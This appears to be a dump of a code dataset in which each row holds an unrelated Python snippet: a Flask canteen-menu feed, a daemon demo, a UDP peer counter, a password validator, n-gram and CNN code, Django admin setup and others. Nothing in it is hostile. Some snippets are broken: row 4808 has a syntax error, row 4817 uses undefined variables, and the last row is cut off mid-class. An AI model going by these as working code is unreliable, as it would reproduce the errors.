index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
4,800 | 139ccdaf7acb2a2d74649f0c32217d1fe71a954a | from flask import Blueprint
views = Blueprint('views', __name__)
from . import routes |
4,801 | 9ce406124d36c2baf09cf0d95fceb2ad63948919 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START gae_python37_app]
from flask import Flask
from bs4 import BeautifulSoup
import requests
import datetime
import regex as re
import unicodedata
from pyopenmensa import feed as op
from lxml import etree
class UnexpectedFormatError(AttributeError):
pass
WARNING = 'No Mensa path!'
CATEGORY_KEY = "cat"
MAIN_MEAL_KEY = "mm"
ADDITION_KEY = "a"
PRICE_KEY = "p"
DATE_KEY = "d"
STUDENT_KEY = "student"
EMPLOYEE_KEY = "employee"
MENSAE = ["westerberg", "mschlossg", "mhaste", "mvechta"]
def get_meals(_mensa, date=None):
result = requests.get(f"https://osnabrueck.my-mensa.de/essen.php?v=5121119&hyp=1&lang=de&mensa={_mensa}")
if result.status_code == 200:
content = result.content
else:
raise ConnectionError
b_soup = BeautifulSoup(content, "html.parser")
unparsed_meals = b_soup.find_all(
href=lambda href: href and re.compile(f"mensa={_mensa}#{_mensa}_tag_20\d{{3,5}}_essen").search(href))
_meals = []
for meal in unparsed_meals:
category = meal.parent.previous_sibling.previous_sibling.text
meal_info = meal.find_all(["h3", "p"])
if len(meal_info) != 3:
raise UnexpectedFormatError("More than 3 meal info")
meal_info = [unicodedata.normalize("NFKD", info.text).replace("\xad", "") for info in meal_info]
_main_meal, _additional, price = meal_info
if price == "-":
price = {}
else:
price_search = re.compile("((\d+,\d{2})|-)\D*((\d+,\d{2})|-)").search(price)
if not price_search:
raise UnexpectedFormatError(f"price formation error {price}")
try:
stud_price_str = price_search.group(2)
emp_price_str = price_search.group(4)
price = {STUDENT_KEY: float(stud_price_str.replace(",", ".")) if stud_price_str else None,
EMPLOYEE_KEY: float(emp_price_str.replace(",", ".")) if emp_price_str else None}
except ValueError:
raise UnexpectedFormatError(f"price formation error {price_search.groups()}")
date_search = re.compile("tag_(\d{4})(\d{1,3})").search(meal["href"])
if not date_search:
raise UnexpectedFormatError(f"Date formation error{meal['href']}")
try:
year, day = [int(group) for group in date_search.groups()]
except ValueError:
raise UnexpectedFormatError(f"Date formation error {year}, {day}")
if date:
date_days = (date - datetime.datetime(date.year, 1, 1)).days
if date_days != day or year != date.year:
continue
meal_date = datetime.datetime(year, 1, 1) + datetime.timedelta(day)
_meals.append({CATEGORY_KEY: category, MAIN_MEAL_KEY: _main_meal,
ADDITION_KEY: _additional, PRICE_KEY: price, DATE_KEY: meal_date.date()})
return _meals
def get_total_feed(mensa):
canteen = op.LazyBuilder()
meals = get_meals(mensa)
for meal in meals:
main_meal = meal[MAIN_MEAL_KEY]
additional = meal[ADDITION_KEY]
ing_reg = re.compile("\(((\d+|[a-n])(,(\d+|[a-n]))*)\)")
# noinspection PyTypeChecker
ingredients_match = ing_reg.findall(main_meal + " " + additional)
ingredients = list(set(",".join([ingred[0] for ingred in ingredients_match]).split(",")))
ingredients.sort()
ingredients = ",".join(ingredients)
main_meal = ing_reg.sub("", main_meal)
additional = ing_reg.sub("", additional)
notes = [note for note in [additional, ingredients] if len(note) > 0]
prices = {role: price for role, price in meal[PRICE_KEY].items() if price}
canteen.addMeal(meal[DATE_KEY], meal[CATEGORY_KEY], main_meal,
notes if len(notes) > 0 else None, prices)
return canteen.toXMLFeed()
def validate(xml_data):
# with open("open-mensa-v2.xsd", 'r') as schema_file:
# xml_schema_str = schema_file.read()
#
# xml_schema_doc = etree.parse(StringIO(xml_schema_str))
# xml_schema = etree.XMLSchema(StringIO(xml_schema_doc))
# parse xml
try:
xml_schema_doc = etree.parse("./open-mensa-v2.xsd")
xml_schema = etree.XMLSchema(xml_schema_doc)
# doc = etree.parse(xml_data.encode())
print('XML well formed, syntax ok.')
etree.fromstring(xml_data.encode(), parser=etree.XMLParser(schema=xml_schema))
# xml_schema.assertValid(doc)
print('XML valid, schema validation ok.')
# check for XML syntax errors
except etree.XMLSyntaxError as err:
raise UnexpectedFormatError(err)
except etree.DocumentInvalid as err:
print('Schema validation error, see error_schema.log')
raise UnexpectedFormatError(err)
# If `entrypoint` is not defined in app.yaml, App Engine will look for an app
# called `app` in `main.py`.
app = Flask(__name__)
@app.route(f'/<mensa>')
def mensa_feed(mensa):
if mensa not in MENSAE:
return WARNING
feed = get_total_feed(mensa)
validate(feed)
return feed
@app.route('/')
@app.route('/index')
def mensa_list():
mensae = "\n ".join(["<list-item>" + mensa + "</list-item>" for mensa in MENSAE])
response = f"""
Status: 404 Not Found
Content-Type: application/xml; charset=utf-8
'<?xml version="1.0" encoding="UTF-8"?>'
<error>
<code>404</code>
<message>Mensa not found</message>
<debug-data>
<list-desc>Valid filenames</list-desc>"
{mensae}
</debug-data>"
</error>"""
return response
if __name__ == '__main__':
# This is used when running locally only. When deploying to Google App
# Engine, a webserver process such as Gunicorn will serve the app. This
# can be configured by adding an `entrypoint` to app.yaml.
app.run(host='127.0.0.1', port=8080, debug=True)
# [END gae_python37_app]
|
4,802 | 3cb96607aaf58a7de3fa0a9cd61b7f4e3c6b061a | import daemon
import time
import sys
#out = open("~/tmp/stdout", "a+")
#err = open("~/tmp/stderr", "a+")
# 如果设定为标准输出,那么关闭终端窗口,退出守护进程。
# Ctrl+c 不会退出进程
# 关闭终端窗口,退出守护进程
def do_main_program():
print("start the main program...")
while True:
time.sleep(1)
print('another second passed')
context = daemon.DaemonContext()
context.stdout = sys.stdout
context.stderr = sys.stderr
with context:
print("start the main program")
do_main_program()
print("end ") |
4,803 | 7e8b192e77e857f1907d5272d03c1138a10c61f4 | import rasterio as rio
from affine import Affine
colour_data = []
def generate_colour_data(width, height, imagiry_data, pixel2coord):
"""Extract color data from the .tiff file """
for i in range(1, height):
for j in range(1, width):
colour_data.append(
[
pixel2coord(j, i)[0],
pixel2coord(j, i)[1],
imagiry_data.read([1])[0][i - 1][j - 1],
]
)
#Code that will extract the width, height and transformation information of the .tiff file and pass it to the function
# generate_colour_data which will populate the color data in a list in the following format: [longitude, latitude, Red, Green, Blue, Alpha]
with rio.open(r'C:\Users\user.DESKTOP-OMQ89VA\Documents\USGS-LIDAR-\data\iowa.tif') as imagery_data:
T0 = imagery_data.transform
T1 = T0 * Affine.translation(0.5, 0.5)
pixel2coord = lambda c, r: (c, r) * T1
width = imagery_data.width
height = imagery_data.height
generate_colour_data(width, height, imagery_data, pixel2coord)
|
4,804 | 68b9f7317f7c6dcda791338ee642dffb653ac694 | import socket
import time
import sys
def main():
if len(sys.argv) != 2:
print("usage : %s port")
sys.exit()
port = int(sys.argv[1])
count = 0
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.settimeout(2)
sock.bind(('', port))
sock.sendto(bytes("IBORN", "utf-8"), ('255.255.255.255', port))
lifetime = time.time() + 10
while time.time() < lifetime:
try:
message, address = sock.recvfrom(1024)
message = message.decode("utf-8")
print("Message : %s from : %s" % (message, str(address)))
if message == "IBORN":
sock.sendto(bytes("ILIVE", "utf-8"), address)
print(address)
me = (socket.gethostbyname(socket.gethostname()), sock.getsockname()[1])
if address != me:
count += 1
print("Current count of copies : %s" % count)
elif message == "ILIVE":
if address != me:
count += 1
print("Current count of copies : %s" % count)
elif message == "IEXIT":
if address != me:
count -= 1
print("Current count of copies : %s" % count)
except socket.timeout:
print("No new messages in 2 seconds.")
time.sleep(1)
sock.sendto(bytes("IEXIT", "utf-8"), ('255.255.255.255', port))
print("Count at exit : %s" % count)
if __name__ == "__main__":
main()
|
4,805 | 69cf28d32e6543271a0855d61a76808b03c06891 | '''
3、 编写一个函数,输入n为偶数时,调用函数求1/2+1/4+...+1/n,当输入n为奇数时,调用函数1/1+1/3+...+1/n
'''
def f(n):
if n%2==0:
sum=0
for x in range(2,n+1,2):
sum+=1/x
print(sum)
if n%2!=0:
sum=0
for x in range(1,n+1,2):
sum+=1/x
print(sum)
|
4,806 | d1944493b7f3e74462ca0163a8c0907e4976da06 | # Problem statement here: https://code.google.com/codejam/contest/975485/dashboard#s=p0
# set state of both bots
# for instruction i
# look at this instruction to see who needs to press their button now
# add walk time + 1 to total time
# decriment walk time of other bot by walk time +1 of current bot (rectify if negative)
# get new target pos for current bot
# update walk time of current bot
input_file = 'large_practice.in'
test_sequences = []
with open(input_file) as f:
test_num = int(f.readline())
for t in range(test_num):
test_sequences.append([])
prob_def = f.readline().split()
prob_size = int(prob_def.pop(0))
for i in range(prob_size):
test_sequences[t].append((prob_def.pop(0), int(prob_def.pop(0))))
def solve_sequence(seq):
O_init_walk_time = 0
B_init_walk_time = 0
try:
O_init_walk_time = abs(next_pos('O', 0, seq)-1)
except Exception:
pass
try:
B_init_walk_time = abs(next_pos('B', 0, seq)-1)
except Exception:
pass
states = {'O': [1, O_init_walk_time], 'B': [1, B_init_walk_time]} # state format [current_pos, walk_time]
total_time = 0
for instruction in range(len(seq)):
target_bot, target_pos = seq[instruction]
walk_time = states[target_bot][1]
total_time += walk_time+1
states[other_bot(target_bot)][1] -= walk_time+1
states[other_bot(target_bot)][1] = max(0, states[other_bot(target_bot)][1])
states[target_bot][0] = target_pos
try:
states[target_bot][1] = abs(next_pos(target_bot, instruction+1, seq)-states[target_bot][0])
except Exception:
pass
return total_time
def next_pos(target_bot, instruction_ind, seq):
for bot_name, button_pos in seq[instruction_ind:]:
if bot_name == target_bot:
return button_pos
else:
raise Exception("Next position not found for {}. (len(seq)=={}, instruction_ind={}, seq={})".format(target_bot, len(seq), instruction_ind, seq))
def other_bot(bot_name):
if bot_name == 'O':
return 'B'
else:
return 'O'
if __name__ == '__main__':
for i, seq in enumerate(test_sequences):
print('Case #{}: {}'.format(i+1, solve_sequence(seq)))
|
4,807 | d72f9d521613accfd93e6de25a71d188626a0952 | """
Password Requirements
"""
# Write a Python program called "pw_validator" to validate a password based on the security requirements outlined below.
# VALIDATION REQUIREMENTS:
## At least 1 lowercase letter [a-z]
## At least 1 uppercase letter [A-Z].
## At least 1 number [0-9].
## At least 1 special character [~!@#$%&*].
## Min length 6 characters.
## Max length 16 characters.
def pw_validator(pw):
pw = list(pw)
if len(pw) < 6 or len(pw) > 16:
return 'Please enter a valid password.'
num_count = 0
lower_count = 0
upper_count = 0
spec_count = 0
for i in pw:
# check numbers
if i in '0123456789':
idx = pw.index(i)
pw[idx] = int(i)
num_count += 1
# check lowercase letters
if i in 'abcdefghijklmnopqrstuvwxyz':
idx = pw.index(i)
lower_count += 1
# check uppercase letters
if i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
idx = pw.index(i)
upper_count += 1
# check special char
if i in '~!@#$%&*':
idx = pw.index(i)
spec_count += 1
if num_count == 0 or lower_count == 0 or upper_count == 0 or spec_count == 0:
return 'Please enter a valid password.'
else:
return 'Success!'
# < 6 char
a = pw_validator('abc')
print(f'abc: {a}')
# > 16 char
b = pw_validator('1234567890abcdefg')
print(f'1234567890abcdefg: {b}')
# no numbers
c = pw_validator('@bcdEFGh!j')
print(f'@bcdEFGh!j: {c}')
# no lowercase letters
d = pw_validator('@BCD3EFGH!J')
print(f'@BCD3EFGH!J: {d}')
# no uppercase letters
e = pw_validator('@bcd3efgh!j')
print(f'@bcd3efgh!j: {e}')
# no special characters
f = pw_validator('Abcd3FGhIj112')
print(f'Abcd3FGhIj112: {f}')
# valid pw
g = pw_validator('P$kj35S&7')
print(f'P$kj35S&7: {g}') |
4,808 | 1855351b20c7965a29864502e4489ab4324c7859 | # -*- coding: utf-8 -*-
"""
Created on Thu Dec 17 13:07:47 2020
@author: mmm
"""
n = 2
n1 = 10
for i in range(n,n1):
if n > 1:
for j in range(2,i):
if (i % j!= 0):
else:
print(i)
|
4,809 | 74a0282495bf4bbd34b397e0922074659a66d6ff | #coding=utf-8
from django.contrib import admin
from models import *
#增加额外的方法
def make_published(modeladmin, request, queryset):
queryset.update(state=1)
class OrderInfoAdmin(admin.ModelAdmin):
list_display = ('ordernum', 'total', 'state')
search_fields = ('total', )
list_filter = ('bpub_date',)
actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
exclude = ('isDelete',)
#2017/1/05注册admin站点
admin.site.register(cart)
admin.site.register(address_info,address_infoAdmin)
admin.site.register(OrderInfo,OrderInfoAdmin)
admin.site.register(OrderDetailInfo)
admin.site.register(GoodsInfo)
|
4,810 | f92b939bf9813e5c78bc450ff270d5fb6171792a | import tensorflow as tf
from vgg16 import vgg16
def content_loss(content_layer, generated_layer):
# sess.run(vgg_net.image.assign(generated_image))
# now we define the loss as the difference between the reference activations and
# the generated image activations in the specified layer
# return 1/2 * tf.nn.l2_loss(content_layer - generated_layer)
return tf.scalar_mul(.5, tf.nn.l2_loss(content_layer - generated_layer))
def style_loss(style_layers, generated_layers, weights):
layer_losses = []
for index in [0, 1, 2, 3]:
reference_layer = style_layers[index]
generated_image_layer = generated_layers[index]
N = reference_layer.shape[3]
M = reference_layer.shape[1] * reference_layer.shape[2]
# layer_losses.append(weights[index] * (4 / (M**2 * N**2)) * tf.nn.l2_loss(get_gram_matrix(reference_layer, N) - get_gram_matrix(generated_image_layer, N)))
layer_losses.append(tf.scalar_mul(weights[index] * 4 / (M**2 * N**2), tf.nn.l2_loss(get_gram_matrix(reference_layer, N) - get_gram_matrix(generated_image_layer, N))))
return sum(layer_losses)
def get_gram_matrix(matrix, num_filters):
# first vectorize the matrix
matrix_vectorized = tf.reshape(matrix, [-1, num_filters])
# then calculate the gram by multiplying the vector by its transpose
return tf.matmul(tf.transpose(matrix_vectorized), matrix_vectorized)
# def run_vgg(sess, image):
# print "making the template", image.shape
# imgs = tf.placeholder(tf.float32, [None, 224, 224, 3])
# net = vgg16(imgs, 'vgg16_weights.npz', sess)
# print "model loaded"
# # net = VGG16({'data': image})
# # net.load(model_data_path, session)
# # session.run(net.get_output(), feed_dict={input_node: image})
# sess.run(net.probs, feed_dict={net.imgs: image})
# return net
|
4,811 | 85c97dfeb766f127fa51067e5155b2da3a88e3be | s = input()
ans = 0
t = 0
for c in s:
if c == "R":
t += 1
else:
ans = max(ans, t)
t = 0
ans = max(ans, t)
print(ans)
|
4,812 | 41e3c18b02f9d80f987d09227da1fbc6bde0ed1d | from __future__ import division
import abc
import re
import numpy as np
class NGram(object):
SEP = ''
def __init__(self, n, text):
self.n = n
self.load_text(text)
self.load_ngram()
@abc.abstractmethod
def load_text(self, text):
pass
def load_ngram(self):
counts = self.empty_count()
c = self.n
while c < len(self.text):
l = self.text[c]
p = '^'.join(self.prev_n(c))
if l:
if p not in counts[l]:
counts[l][p] = 1
else:
counts[l][p] += 1
c += 1
self.counts = counts
def get_count(self, x, y=''):
if len(y) > self.n:
# raise RuntimeError('Invalid n-gram')
return 0
elif len(y) == self.n:
p = '^'.join(y)
if x in self.counts and p in self.counts[x]:
return self.counts[x][p]
else:
return 0
else:
p = '^'.join(y)
count = 0
if x in self.counts:
for x_prev in self.counts[x].keys():
if x_prev[-len(p):] == p:
count += self.counts[x][x_prev]
return count
def prev_n(self, i):
return self.text[i - self.n: i]
def empty_count(self):
s = {}
return { c: dict() for c in self.cols() }
def generate_sentence(self, length):
c = length
s = []
while c > 0:
if len(s) < self.n:
sampling = self.sample(s)
else:
sampling = self.sample(s[(len(s) - self.n):])
s.append(sampling)
c -= 1
return self.SEP.join(s)
def sample(self, previous):
assert len(previous) <= self.n
tokens, distribution = self.distribution('^'.join(previous))
i = np.nonzero(np.random.multinomial(1, distribution))[0][0]
return tokens[i]
def distribution(self, previous):
tokens = []
counts = []
for token in self.counts.keys():
count = self.get_count(token, previous)
tokens.append(token)
counts.append(count)
s = sum(counts)
probability = s and (lambda c: c / s) or (lambda c: 1/len(counts))
return (tokens, map(probability, counts))
@abc.abstractmethod
def cols(self):
pass
@staticmethod
def clean(text):
s = text.lower()
s = re.sub(r'\n', ' ', s)
s = re.sub(r'[^a-z ]+', ' ', s)
return s
|
4,813 | ae9f1c4f70801dace0455c051ba4d4bfb7f3fe67 | from django.core import management
from django.conf import settings
def backup_cron():
if settings.DBBACKUP_STORAGE is not '':
management.call_command('dbbackup')
|
4,814 | 7821b07a49db9f3f46bedc30f2271160e281806f | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision import datasets, transforms, models
from torchvision.utils import make_grid
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import os
from PIL import Image
from IPython.display import display
import warnings
warnings.filterwarnings('ignore')
train_transform = transforms.Compose([
# transforms.RandomRotation(10),
# transforms.RandomHorizontalFlip(),
# transforms.Resize(224),
# transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
dataset = datasets.ImageFolder('shapes_dataset_LR',transform=train_transform)
torch.manual_seed(42)
train_data, test_data = torch.utils.data.random_split(dataset, [9000, 1000])
class_names = dataset.classes
train_loader = DataLoader(train_data, batch_size = 10, shuffle = True)
test_loader = DataLoader(test_data, batch_size = 10)
for images, labels in train_loader:
break
im = make_grid(images, nrow=5)
inv_normalize = transforms.Normalize(
mean=[-0.485/0.229, -0.486/0.224, -0.406/0.225],
std=[1/0.229, 1/0.224, 1/0.225]
)
im_inv = inv_normalize(im)
print(labels)
plt.figure(figsize=(12,4))
plt.imshow(np.transpose(im_inv.numpy(), (1,2,0)))
plt.show()
class ConvolutionalNetwork(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 6, 3, 1)
self.conv2 = nn.Conv2d(6, 16, 3, 1)
self.fc1 = nn.Linear(54 * 54 * 16, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 2)
def forward(self, X):
X = F.relu(self.conv1(X))
X = F.max_pool2d(X, 2, 2)
X = F.relu(self.conv2(X))
X = F.max_pool2d(X, 2, 2)
X = X.view(-1, 54 * 54 * 16)
X = F.relu(self.fc1(X))
X = F.relu(self.fc2(X))
X = self.fc3(X)
return F.log_softmax(X, dim=1)
torch.manual_seed(101)
CNNmodel = ConvolutionalNetwork()
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(CNNmodel.parameters(), lr=0.001)
# # to count each class in validation set
# arr = np.array(np.array(dataset.imgs)[test_data.indices, 1], dtype=int)
# cnt = np.zeros((6,1), dtype = int)
# for i in range(1000):
# for j in range(6):
# if arr[i] == j:
# cnt[j] += 1
# break
# print(cnt)
# for reproducable results
seed = 42
np.random.seed(seed)
torch.manual_seed(seed)
#The compose function allows for multiple transforms
#transforms.ToTensor() converts our PILImage to a tensor of shape (C x H x W) in the range [0,1]
#transforms.Normalize(mean,std) normalizes a tensor to a (mean, std) for (R, G, B)
# transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
#
# train_set = torchvision.datasets.CIFAR10(root='./cifardata', train=True, download=True, transform=transform)
#
# test_set = torchvision.datasets.CIFAR10(root='./cifardata', train=False, download=True, transform=transform)
#
# classes = ('0', '1', '2', '3', '4', '5')
# x = torch.rand(5, 3)
# print(x) |
4,815 | fa7246a4e7595393ca9aaec777fa85d782bb816e |
n = 0.3
c = 2
def func(x):
return x**c
def der_func(x):
return c * x**(c - 1)
def na_value(x):
return x - n*der_func(x)
def main():
x = 100
v_min = func(x)
for i in range(10):
cur_v = func(x)
x = na_value(x)
if cur_v < v_min:
v_min = cur_v
print("----> " ,i ," cur = ",cur_v," x = ",x," v_min = " ,v_min )
main() |
4,816 | 4296dc5b79fd1d2c872eb1115beab52a0f067423 | # ----------------------------------------------------------------------------
# Copyright (c) 2016-2018, q2-chemistree development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import unittest
from q2_chemistree.plugin_setup import plugin as chemistree_plugin
class PluginSetupTests(unittest.TestCase):
def test_plugin_setup(self):
self.assertEqual(chemistree_plugin.name, 'chemistree')
|
4,817 | e85f203e71c8fdad86bd82b19104263cca72caf1 | from hierarchical_envs.pb_envs.gym_locomotion_envs import InsectBulletEnv
import argparse
import joblib
import tensorflow as tf
from rllab.misc.console import query_yes_no
# from rllab.sampler.utils import rollout
#from pybullet_my_envs.gym_locomotion_envs import Ant6BulletEnv, AntBulletEnv, SwimmerBulletEnv
from hierarchical_envs.pb_envs.gym_locomotion_envs import InsectBulletEnv, AntBulletEnv, SwimmerBulletEnv
from rllab.envs.gym_wrapper import GymEnv
import numpy as np
from rllab.misc import tensor_utils
import time
north_x = 0
north_y = 1e3
def simple_high(states):
x, y, tx, ty = states
if x < tx - 50:
return 0
if x > tx + 50:
return np.pi
if y < ty:
return np.pi / 2
return -np.pi / 2
def rollout(env, pi_low, pi_high, tx=700, ty=0, max_path_length=np.inf, animated=False, speedup=1,
always_return_paths=False):
observations = []
actions = []
rewards = []
agent_infos = []
env_infos = []
o = env.reset()
x, y, z = env.robot.body_xyz
r, p, yaw = env.robot.body_rpy
target_theta = np.arctan2(
ty - y,
tx - x)
angle_to_target = target_theta - yaw
print('direction: ', o[0], o[1])
path_length = 0
if animated:
env.render()
while path_length < max_path_length:
a_high = pi_high([x, y, tx, ty])
feed_o[0] = np.cos(a_high) # get direction
feed_o[1] = np.sin(a_high)
a, agent_info = agent.get_action(feed_o)
next_o, r, d, env_info = env.step(a)
observations.append(env.observation_space.flatten(o))
rewards.append(r)
actions.append(env.action_space.flatten(a))
agent_infos.append(agent_info)
env_infos.append(env_info)
path_length += 1
if d:
break
o = next_o
if animated:
env.render()
timestep = 0.05
time.sleep(timestep / speedup)
if animated and not always_return_paths:
return
return dict(
observations=tensor_utils.stack_tensor_list(observations),
actions=tensor_utils.stack_tensor_list(actions),
rewards=tensor_utils.stack_tensor_list(rewards),
agent_infos=tensor_utils.stack_tensor_dict_list(agent_infos),
env_infos=tensor_utils.stack_tensor_dict_list(env_infos),
)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('low_level', type=str,
help='path to lower_level policy')
parser.add_argument('--max_path_length', type=int, default=500,
help='Max length of rollout')
parser.add_argument('--speedup', type=float, default=1,
help='Speedup')
args = parser.parse_args()
data = joblib.load(args.file)
pi_low = data['policy']
pi_high = simple_high
env = GymEnv(InsectBulletEnv(render=True, d=0.75, r_init=None, d_angle=True))
while True:
path = rollout(env, pi_low, pi_high, max_path_length=args.max_path_length,
animated=True, speedup=args.speedup)
if not query_yes_no('Continue simulation?'):
break
|
4,818 | 2b3983fd6a8b31604d6d71dfca1d5b6c2c7105e0 | import pandas as pd
import requests
import re
from bs4 import BeautifulSoup
from datetime import datetime
nbaBoxUrl = 'https://www.basketball-reference.com/boxscores/'
boxScoreClass = 'stats_table'
def getBoxScoreLinks():
page = requests.get(nbaBoxUrl)
soup = BeautifulSoup(page.content, 'html.parser')
gameLinks = []
data = soup.findAll('td', {'class': 'right gamelink'})
for div in data:
links = div.findAll('a')
for a in links:
gameLinks.append(a['href'])
return gameLinks
def getBoxScoreTeams(soup):
data = soup.find('div', {'class': 'scorebox'})
substring = 'teams'
teams = []
team = {'name':'', 'abrv':'', 'table' : '', 'opponent' : ''}
for a in data.find_all('a', href=True):
if substring in a['href']:
new = team.copy()
new['name'] = a.getText()
new['abrv'] = a['href'].split('/')[2]
teams.append(new)
#set opponent
for team in teams:
for opponent in teams:
if team['name'] != opponent['name']:
team['opponent'] = opponent['name']
return teams
def getGameDate(soup):
for div in soup.find_all('div', {'class': 'scorebox_meta'}):
childdiv = div.find('div')
#format date
datetime_object = datetime.strptime(childdiv.string, '%I:%M %p, %B %d, %Y')
return datetime_object.strftime("%m/%d/%Y")
def getHomeTeam(url):
homeTeam = url.split('/')[4]
homeTeam = re.findall("[a-zA-Z]+", homeTeam)[0]
return homeTeam
def getGameId(url):
gameId = url.split('/')[4]
gameId = re.findall("\d+", gameId)[0]
return gameId
def getFileName(url):
fileName = url.split('/')[4]
fileName = fileName.rsplit( ".", 1 )[ 0 ]
return fileName
def removeSummaryRows(df):
df = df[df.Starters != 'Team Totals']
df = df[df.Starters != 'Reserves']
return df
def updateColumns(df):
df = df.drop('FG%', 1)
#rename
df = df.rename({'Starters': 'Players'}, axis=1)
return df
def replaceDNP(df):
df = df.replace('Did Not Play', 0)
return df
def orderColumns(df):
df = df[['Players', 'Team', 'Opponent', 'GameID', 'Date', 'Court', 'MP', 'FG', 'FGA', '3P', '3PA', 'FT', 'FTA', 'ORB', 'DRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']]
return df
def getGameBoxScore():
url = 'https://www.basketball-reference.com/boxscores/202110250LAC.html'
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html.parser')
#get teams
teams = getBoxScoreTeams(soup)
gameDate = getGameDate(soup)
homeTeam = getHomeTeam(url)
gameId = getGameId(url)
fileName = getFileName(url)
#Remove extra header
for div in soup.find_all("tr", {'class':'over_header'}):
div.decompose()
masterDf = pd.DataFrame()
for team in teams:
team['table'] = soup.find_all("table", {'id':'box-'+ team['abrv'] +'-game-basic'})
#format dataframe
df = pd.read_html(str(team['table']))[0]
#constants
df['Team'] = team['name']
df['Opponent'] = team['opponent']
df['Date'] = gameDate
df['GameID'] = gameId
if team['abrv'] == homeTeam:
df['Court'] = 'Home'
else:
df['Court'] = 'Away'
masterDf = pd.concat([masterDf, df], ignore_index=True)
#master_df = master_df.append(df,ignore_index=True)
#format dataframe
masterDf = removeSummaryRows(masterDf)
masterDf = replaceDNP(masterDf)
masterDf = updateColumns(masterDf)
masterDf = orderColumns(masterDf)
print(masterDf.head(2))
masterDf.to_csv(fileName + '.csv', index=False, sep='\t', encoding='utf-8')
#add footer row
with open(fileName + '.csv','a') as fd:
fd.write('\n')
fd.write('Sample Link:' + '\t' + url)
#gameLinks = getBoxScoreLinks()
getGameBoxScore()
|
4,819 | 0475c6cab353f0d23a4c4b7f78c1b47ecc5f8d3b | '''
log.py
version 1.0 - 18.03.2020
Logging fuer mehrere Szenarien
'''
# Imports
import datetime
# Globale Variablen
ERROR_FILE = "error.log"
LOG_FILE = "application.log"
def error(msg):
__log_internal(ERROR_FILE, msg)
def info(msg):
__log_internal(LOG_FILE, msg)
def __log_internal(filename, msg):
now = datetime.datetime.now()
f = open(filename, "a+")
f.write("{} : {}\n".format(now.strftime("%Y-%m-%d %H:%M:%S"), msg))
f.close()
if __name__ == '__main__':
print("Erstelle Testfiles")
info("Test")
error("Test")
|
4,820 | dc7d75bf43f1ba55673a43f863dd08e99a1c0e0f | import unittest
from validate_pw_complexity import *
class Test_PW_Functions(unittest.TestCase):
def test_pw_not_long_enough_min(self):
sample_pass ="abcd"
expected_result = False
result = validate_pw_long(sample_pass)
self.assertEqual(expected_result, result)
def test_pw_just_long_enough_min(self):
sample_pass = "abcdadca"
expected_result = False
result = validate_pw_long(sample_pass)
self.assertEqual(expected_result, result)
def test_pw_long_enough_min(self):
sample_pass = "abcdadcaabc"
expected_result = False
result = validate_pw_long(sample_pass)
self.assertEqual(expected_result, result)
|
4,821 | ec9184fa3562ef6015801edf316faa0097d1eb57 | '''
236. Lowest Common Ancestor of a Binary Tree
https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-tree/
Given a binary tree, find the lowest common ancestor (LCA) of two given nodes in the tree.
According to the definition of LCA on Wikipedia:
“The lowest common ancestor is defined between two nodes p and q as the lowest node in T that
has both p and q as descendants (where we allow a node to be a descendant of itself).”
Given the following binary tree: root = [3,5,1,6,2,0,8,null,null,7,4]
Example 1:
Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1
Output: 3
Explanation: The LCA of nodes 5 and 1 is 3.
Example 2:
Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4
Output: 5
Explanation: The LCA of nodes 5 and 4 is 5, since a node can be a descendant of
itself according to the LCA definition.
Note:
All of the nodes' values will be unique.
p and q are different and both values will exist in the binary tree.
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def postorder(self, node: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':
'''
@return: p, q, their lca, or None
Improvement: record how many nodes are found to do early return
'''
if not node:
return None
if node == p or node == q:
# node is p, q or their lca
return node
left = self.postorder(node.left, p, q)
right = self.postorder(node.right, p, q)
if left:
if right:
return node # p,q is in left and right, node is lca
else:
return left # left is p or q
else:
if right:
return right # right is p or q
else:
return None # p or q not in node or its children
def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':
return self.postorder(root, p , q)
|
4,822 | 191a57d3f13fcbe217ff6d0bd92dea163d5fb3cf | import re
from typing import Any, Dict, List
import aiosqlite
from migri.elements import Query
from migri.interfaces import ConnectionBackend, TransactionBackend
class SQLiteConnection(ConnectionBackend):
_dialect = "sqlite"
@staticmethod
def _compile(query: Query) -> dict:
q = query.statement
v = []
if query.placeholders:
for p in query.placeholders:
# Append value
v.append(query.values[p.replace("$", "")])
# Substitute
q = re.sub(f"\\{p}", "?", q)
return {"query": q, "values": v}
async def connect(self):
self.db = await aiosqlite.connect(self.db_name)
self.db.row_factory = aiosqlite.Row
async def disconnect(self):
await self.db.close()
